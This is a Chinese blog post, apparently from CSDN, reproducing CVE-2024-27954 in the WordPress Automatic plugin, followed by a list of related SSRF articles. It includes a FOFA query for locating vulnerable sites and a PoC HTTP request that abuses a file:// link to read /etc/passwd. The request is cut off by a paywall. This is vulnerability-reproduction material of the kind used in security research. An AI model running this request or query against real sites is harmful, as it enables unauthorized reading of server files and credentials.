WordPress AutomaticPlugin SSRF漏洞复现(CVE-2024-27954)

已于 2024-03-31 21:02:32 修改
阅读量492 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-03-31 21:02:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/137207475
版权

0x01 产品简介

WordPress是一款免费开源的内容管理系统(CMS),最初是一个博客平台,但后来发展成为一个功能强大的网站建设工具,适用于各种类型的网站,包括个人博客、企业网站、电子商务网站等,并逐步演化成一款内容管理系统软件。

0x02 漏洞概述

WordPress AutomaticPlugin 其插件wp_automatic易受未经验证的任意文件下载和SSRF的攻击。位于downloader.php文件中,可能允许攻击者从网站下载任何文件。敏感数据,包括登录凭据和备份文件等。

0x03 复现环境

FOFA:

app="AUTOMATTIC-WordPress" && icon_hash="1198047028"

0x04 漏洞复现

PoC

GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/a
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
漏洞WordPress Automatic Plugin 任意文件下载漏洞(CVE-2024-27954)
qq_67810151的博客
03-27 417
WordPress Automatic Plugin 小于 3.92.1 的版本存在任意文件下载漏洞,未授权的攻击者可以通过该漏洞下载服务器的任意文件,从而获取大量敏感信息。
WordPress 4.4 SSRF
乐枕的家
08-22 2776
通过这个漏洞熟悉一下WP的代码。数据跟踪[xmlrpc.php] 获取POST的数据$HTTP_RAW_POST_DATA = file_get_contents( 'php://input' );创建xmlrpc_server,使用serve_request()方法处理输入。$wp_xmlrpc_server_class = apply_filters( 'wp_xmlrpc_server_cl
【学习笔记】WordPress <4.5 SSRF
chualam的博客
11-01 263
SSRF服务端请求伪造 php中常见的涉及对远程资源访问的函数 fsockopen()file_get_content() curl_exec() 主要是通过request的方法 wordpress对请求的url有过滤:wp-includes/ http.php wp_http_vaildate_url进行url判断 js中的trim是删除特定符号的意思 preg_match执行正则表达式匹配 curl接受八进制 因此可以绕过ip地址段的正则表达式 有可能请求没有回显 但是可以通过nc来..
CVE-2024-27954 WordPress Automatic插件 SSRF与任意文件读取漏洞分析
最新发布
shelter1234567的博客
05-27 495
WordPress Automatic 插件
wordpress函数wp_http_validate_url畸形IP绕过验证SSRF漏洞
weixin_33738982的博客
11-23 161
2019独角兽企业重金招聘Python工程师标准>>> ...
漏洞WordPress AutomaticPlugin SSRF漏洞
https://blog.echo234.cn/
04-02 395
WordPress AutomaticPlugin 其插件wp_automatic易受未经验证的任意文件下载和SSRF的攻击。位于downloader.php文件中,可能允许攻击者从网站下载任何文件。敏感数据,包括登录凭据和备份文件等。
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
XStream1.4.16反序列化漏洞CVE-2020-26258、CVE-2020-26259)
05-08
XStream是一个常用的Java对象和XML相互转换的工具。...攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-2020-26259 任意文件删除漏洞
Microsoft_Exchange_Server_SSRF_CVE-2021-26855:Microsoft Exchange Server SSRF防御(CVE-2021-26855)
03-08
Microsoft_Exchange_Server_SSRF_CVE-2021-26855 zoomeye dork:app:“ Microsoft Exchange Server” 使用Seebug工具箱及pocsuite3编写的脚本 ,对近一年的数据进行探测: 成功率大约:1500/5000 = 30%
检测通过“ proxylogon”组漏洞CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065)利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发
05-27
预认证SSRF,CVSS:3.0 9.1 / 8.4 CVE-2021-26857,不安全的反序列化导致特权升级到SYSTEM级别,CVSS:3.0 7.8 / 7.2 CVE-2021-26858,认证后文件写入, CVSS:3.0 7.8 / 7.2 CVE-2021-27065,认证后文件写入,CVSS...
CVE-2021-26855:CVE-2021-26855 exp
03-08
CVE-2021-26855 CVE-2021-26855 ssrf简单利用golang练习影响版本Exchange Server 2013小于CU23 Exchange Server 2016小于CU18 Exchange Server 2019小于CU7利用条件该突破性常规的交换漏洞,此突破并没有一个可登录...
WordPress Automatic Plugin 任意文件下载漏洞(CVE-2024-27954)(含批量验证poc)_wordpress插件漏洞批量
m0_59117112的博客
04-15 395
WordPress Automatic Plugin 小于3.92.1的版本存在任意文件下载漏洞,未授权的攻击者可以通过该漏洞下载服务器的任意文件,从而获取大量敏感信息。
[漏洞分析]WordPress未经身份验证的远程代码执行CVE-2024-25600
网络安全知识分享
03-14 1572
Bricks
深度了解SSRF漏洞攻击/Web安全笔记/
qq_60115503的博客
04-14 1239
SSRF形成原因:服务端提供了从其他服务器获取数据的功能,但没有对内网目标地址做过滤与限制 可能会出的地方 漏洞验证 SSRF相关函数 SSRF相关伪协议 SSRF的作用 SSRF模拟 前言 SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞,一般情况下,SSRF攻击的目标是从外网无法访问的内部系统(正是因为它是由服务端发起的,所以它能够请求到于与它相连而与外网隔离的内...
SSRF漏洞详解 一文了解SSRF漏洞
闵行小鱼塘
11-09 5184
本篇总结归纳SSRF漏洞
WordPress xmlrpc.php SSRF漏洞
maverickpig的博客
07-08 1263
网络安全自学日志-漏洞篇:WordPress xmlrpc.php SSRF漏洞 本文参考https://blog.csdn.net/god_zzZ/article/details/109991484,为本人笔记,如有侵权可联系我删除 该漏洞工作中遇到过 一、漏洞详情 1.1 WordPress xmlrpc.php 存在SSRF漏洞 利用WordPress的xmp-rpc接口,通过Pingback可以实的服务器端请求伪造 (Server-side request forgery,SSRF)和远程
浅谈CSRF与SSRF
热门推荐
pygain的博客
10-24 1万+
今天看在看《XSS跨站脚本攻击剖析与防御》的时候,里边提到了CSRF与SSRF,在网络查询了这部分的资料后,简单总结了下二者的关系与不同
wordpress xmlrpc.php 漏洞,关于WordPress xmlrpc.php Pingback缺陷与SSRF攻击
weixin_29207533的博客
03-10 829
前两天我因为web2hack.org挂了,而分析到原因,当时有些思路,想追踪下去,不过不明确,后来发WordPress最新版3.5.1出来了,我看到官方说修补了几个安全问题(http://codex.wordpress.org/zh-cn:3.5.1_%E7%89%88%E6%9C%AC),其中有一条引起我的注意:通过Pingback实的服务器端请求伪造 (Server-side reques...
关于Weblogic SSRF漏洞CVE-2014-4210)说法正确的是 (2分) A 通过返回数据包中的错误信息,即可探测内网状态 B 访问/uddiexplorer/SearchPublicRegistries.jsp,若能正常访问,则可能存在此漏洞 C 实战中可以通过爆破,从返回数据包的长度来判断开放了哪些端口,再根据开放的端口深入利用 D 影响版本为:10.0.2.0,10.3.6.0,12.2.1.2
06-08
关于Weblogic SSRF漏洞CVE-2014-4210),正确的说法是B 访问/uddiexplorer/SearchPublicRegistries.jsp,若能正常访问,则可能存在此漏洞,D 影响版本为:10.0.2.0,10.3.6.0,12.1.3.0.0,12.2.1.0.0,12.2.1.1.0。 CVE-2014-4210是Weblogic Server的一种SSRF漏洞,攻击者可以通过构造恶意请求,利用此漏洞访问内部网络资源,可能导致敏感信息泄露、系统崩溃等风险。 关于这个漏洞,正确的说法是: A. 通过返回数据包中的错误信息,可能可以探测内网状态,但并不是一定可以探测。 B. 访问/uddiexplorer/SearchPublicRegistries.jsp,若能正常访问,则可能存在此漏洞,这个页面是Weblogic Server中的一个测试页面,可以用来测试UDDI的功能。 C. 实战中可以通过爆破,从返回数据包的长度来判断开放了哪些端口,再根据开放的端口深入利用,这个说法并不正确,因为端口长度并不一定和端口号对应,而且也不一定能够得到正确的结果。 D. 影响版本包括10.0.2.0,10.3.6.0,12.1.3.0.0,12.2.1.0.0,12.2.1.1.0等版本。 因此,选项B和D是正确的说法。 答案:B、D。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值